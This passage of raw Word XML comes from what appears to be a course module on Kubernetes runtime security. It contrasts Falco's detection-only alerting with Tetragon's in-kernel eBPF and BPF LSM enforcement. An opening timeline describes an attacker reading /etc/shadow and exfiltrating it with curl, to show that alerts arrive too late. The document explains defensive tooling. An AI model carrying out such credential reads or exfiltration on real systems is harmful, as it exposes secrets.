      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=0ms     : cat reads /etc/shadow → SUCCESS (damage: secrets exfiltrated to /tmp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=1ms     : Falco's eBPF probe fires on openat syscall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=3ms     : Falco processes event, matches rule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=10ms    : Alert emitted to stdout/Falcosidekick</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=50ms    : Alert reaches SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=55ms    : Alert routed to Slack/PagerDuty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=5s-15min: Human or automation sees alert, investigates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=5-30min : Human responds — kills pod, revokes tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MEANWHILE: curl has finished exfiltrating the data (probably in ~100ms)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker WON. The secret is exfiltrated. Falco RECORDED THE INCIDENT but did not stop it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 When Detection Is Enough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For many threats, this workflow is fine. Detection + response is adequate when:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ATTACK IS SLOW — the attacker needs to reconnoiter, try things, move laterally. Response within minutes stops them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The DAMAGE IS BOUNDED — one container's data isn't catastrophic if lost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">THE SYSTEM CAN RECOVER — rotate credentials, patch the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FORENSICS MATTER — you NEED the evidence of what happened, even if you couldn't prevent it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For these scenarios, Falco's detection-first model works well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 When Detection Is Not Enough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some scenarios demand prevention:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.1 High-Value Secret Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the secret is your root CA private key, session master token, or similar — even one successful read is catastrophic. Rotating after the fact doesn't help; the attacker already has it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.2 Supply-Chain Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A compromised dependency runs malicious code the moment your container starts. Detection fires at the moment of execution; response takes seconds. The malicious code has already run. If it installs persistence, steals secrets, or encrypts data, the damage is done.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.3 Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker who reaches one container tries to pivot. If they can execute code, try authentication, or probe services in sub-second intervals, they're gone before response happens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.4 Regulated Environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some compliance frameworks (healthcare, government, financial) require that specific actions CANNOT HAPPEN, not just that they'll be detected. PCI DSS has specific requirements around preventing unauthorized access; HIPAA requires "reasonable safeguards" preventing disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.5 Zero-Trust Architectures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zero-trust means "never trust, always verify" — continuously, at every interaction. In runtime terms: assume every process might be compromised; verify every action before allowing it. This requires PREVENTION capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 The Falco Talon Angle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 7 introduced Falco Talon — response automation that acts on Falco alerts. Does Talon close the enforcement gap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTIALLY. Talon reduces response time from minutes to seconds. But it's still REACTIVE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection (Falco): event happened → alert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Response (Talon): alert received → take action</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Total time: hundreds of milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For slow attacks, this is fine. For fast attacks (data exfiltration, memory scraping, crypto operations), hundreds of milliseconds is still too long. Meanwhile, the attacker's syscall has already completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 The Prevention Answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">True prevention requires ACTING BEFORE THE SYSCALL COMPLETES. The only way to do this is from INSIDE THE KERNEL, at the syscall boundary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Traditional detection:                  Tetragon enforcement:</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App requests syscall                   App requests syscall</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Syscall completes                     Kernel LSM hook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eBPF hook fires                       eBPF program checks policy</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Event sent to userspace              Return ALLOW or DENY</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Userspace alerts                     Syscall completes or is denied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DAMAGE ALREADY DONE                  DAMAGE PREVENTED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is what Tetragon provides. It's not just faster Falco — it's a FUNDAMENTALLY DIFFERENT ARCHITECTURE that can intervene before actions complete.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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What Tetragon Is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 The Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is an open-source, eBPF-based Kubernetes-aware security observability and runtime enforcement platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That definition includes three important pieces:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SECURITY OBSERVABILITY — like Falco, Tetragon watches and emits events about security-relevant activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RUNTIME ENFORCEMENT — unlike Falco, Tetragon can BLOCK actions at the kernel level before they complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KUBERNETES-AWARE — Tetragon deeply integrates with Kubernetes (CRDs, namespace awareness, pod context).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 The Four Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's core capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1 Process Lineage Tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon tracks every process's FULL ANCESTRY — its parent, grandparent, all the way to the container's init. This is foundational context. It means every event Tetragon emits has complete process context — not just "curl ran," but "curl ran, parent=bash, grandparent=sshd, container=webapp, image=my-app:v1."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2 Rich Event Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process starts, file accesses, network connections, capability changes, namespace operations, kernel module loads. Everything security-relevant. Comparable to Falco's syscall monitoring but with richer correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3 Kernel-Level Policy Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using BPF LSM (covered in Part 9), Tetragon can BLOCK syscalls before they complete. Not just alert — actually stop the action. This is the capability Falco lacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.4 Real-Time Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond block/allow, Tetragon can respond with actions: send a signal (SIGKILL the process), change capabilities, return a specific errno, or emit an event for downstream consumers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Tetragon's Origin Story</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon was announced in April 2022 by Isovalent. The announcement framed it as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security dimension of the Cilium platform (joining networking and observability).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A response to the "detection is not enough" observation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leveraging newly-mature BPF LSM to enable in-kernel enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initially it was part of the Cilium project. In 2022 it became a STANDALONE CNCF project — acknowledging that Tetragon's user base extends beyond Cilium adopters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As of 2026, Tetragon is CNCF INCUBATING (promoted from Sandbox in 2023). Its trajectory tracks toward graduation as adoption scales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Who Should Care About Tetragon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific organizations benefit most:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ENTERPRISES WITH ZERO-TRUST MANDATES — prevention requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">REGULATED INDUSTRIES — prevention-oriented compliance frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXISTING CILIUM USERS — natural ecosystem extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ORGANIZATIONS WITH HIGH-VALUE SECRETS — exfiltration prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TEAMS NEEDING K8S-NATIVE POLICY — TracingPolicy CRDs fit Kubernetes workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 What Tetragon Doesn't Do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Being clear:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is NOT a replacement for network policy (use Cilium for that).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is NOT a SIEM — alerts flow to external systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is NOT an image scanner or CVE detector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is NOT a broad integration hub — fewer downstream destinations than Falco's Falcosidekick.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is NOT the default choice for simple detection-only use cases — Falco is more mature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's NICHE: kernel-level enforcement + Kubernetes-native policy + tight integration with Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 The "Tetra-" Naming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon means "four-sided" in Greek. The naming references its FOUR OBSERVATIONAL DOMAINS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PROCESSES — what runs, by whom.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FILES — what's read/written.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NETWORK — what connects where.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CAPABILITIES — what permissions processes gain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These four together describe most of what security monitoring cares about. Tetragon's claim: cover all four, with full process lineage context, and you have visibility into everything that matters.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3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection + Enforcement Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 The Unified Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
